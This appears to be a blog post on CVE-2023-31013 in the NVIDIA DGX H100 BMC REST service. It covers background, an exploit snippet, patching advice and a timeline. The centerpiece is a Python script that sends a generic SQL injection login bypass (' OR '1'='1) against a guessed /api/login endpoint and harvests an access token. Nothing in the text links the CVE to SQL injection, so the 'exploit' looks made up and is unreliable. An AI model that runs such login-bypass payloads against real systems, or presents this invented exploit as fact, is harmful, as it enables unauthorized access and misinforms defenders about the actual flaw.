CVE-2023-31013 - NVIDIA DGX H100 BMC Vulnerability: REST Service Improper Input Validation, Potential Information Disclosure, and Privilege Escalation
In this post, we will delve into the recently discovered vulnerability within the NVIDIA DGX H100 Baseboard Management Controller (BMC) REST service, which has been given the identifier CVE-2023-31013. This vulnerability may enable attackers to carry out privilege escalation and gather sensitive information from the targeted system. We will begin by discussing the origin of the vulnerability and then demonstrate sample exploit code before finally evaluating possible remediation strategies. Let's dive in.
Background
NVIDIA's DGX H100 is a high-performance computing system designed for deep learning, analytics, and various Artificial Intelligence (AI) applications. The BMC is a critical component responsible for monitoring the health, security, and remote management of the system. Unfortunately, an improper input validation vulnerability has been discovered in the BMC REST service, which could potentially be exploited by attackers seeking to escalate privileges and extract sensitive information from the system.
The NVIDIA Security Bulletin can be found here
The official Common Vulnerabilities and Exposures (CVE) report is available here
Exploit Details
The vulnerability, CVE-2023-31013, lies in the BMC REST service's inability to correctly validate user input. This may lead to an attacker exploiting the system and escalating their privileges to gain unauthorized access to sensitive information. To illustrate this, we will provide a simple code snippet that exploits the improper input validation using a specifically crafted HTTP POST request.
Code Snippet
import requests
# Target URL and endpoint
url = "http://TARGET_IP/api/login";
headers = {"Content-Type": "application/json"}
# Craft malicious payload
payload = {
"username": "admin", # Default BMC admin user
"password": "ANY_PASSWORD_HERE' OR '1'='1" # SQL Injection payload
}
# Send HTTP POST request with malicious payload
response = requests.post(url, json=payload, headers=headers)
# Check for successful exploitation by analyzing response
if response.status_code == 200:
access_token = response.json().get("access_token")
print(f"Exploit successful! Access Token: {access_token}")
else:
print("Exploit failed.")
If the exploit is successful, an attacker would be granted an access token, allowing unauthorized access to the BMC REST service. This access could potentially expose sensitive information and enable the attacker to perform unauthorized actions on the system.
Possible Remediation
NVIDIA is fully aware of the CVE-2023-31013 vulnerability and has released an official patch within the NVIDIA DGX OSA (Operating System and Applications) software update to address the issue: NVIDIA DGX OSA software update
It is strongly recommended that DGX H100 system administrators apply the update immediately to protect against potential exploits. Additionally, organizations should always ensure that systems are patched and up to date, with proper access controls and network security measures put in place.
Conclusion
The CVE-2023-31013 vulnerability in NVIDIA's DGX H100 BMC REST service is a critical concern for organizations relying on these high-performance computing systems. By exploiting this vulnerability, attackers can potentially perform unauthorized actions on the system and access sensitive information. As such, it is imperative that system administrators immediately apply the available patch and maintain rigorous network security best practices.
Timeline
Published on: 09/20/2023 02:15:00 UTC
Last modified on: 09/22/2023 16:10:00 UTC